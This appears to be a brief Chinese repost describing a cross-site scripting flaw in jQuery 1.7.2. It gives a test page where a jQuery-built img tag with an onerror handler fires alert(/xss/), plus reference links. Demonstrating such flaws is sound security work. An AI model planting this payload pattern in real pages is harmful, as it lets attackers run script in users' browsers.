JQuery-1.7.2.min.js跨站脚本漏洞
测试页面:
<!DOCTYPE html>
<html>
<head>
<script src="http://x.x.x.x:80/js/jquery-1.7.2.min.js"></script>
<meta charset="utf-8">
<title>JS Bin</title>
</head>
<body>
JQuery Test:
http://x.x.x.x:80/js/jquery-1.7.2.min.js
<script>
var img = $("<img onerror='alert(/xss/);'>");
img.attr('src','xx');
</script>
</body>
</html>
参考链接:
http://jsbin.com/xiyuwuvubu/edit?html,js,output
https://segmentfault.com/a/1190000002463775
声明:本站所有文章资源内容,如无特殊说明或标注,均为采集网络资源。如若本站内容侵犯了原著者的合法权益,可联系本站删除。
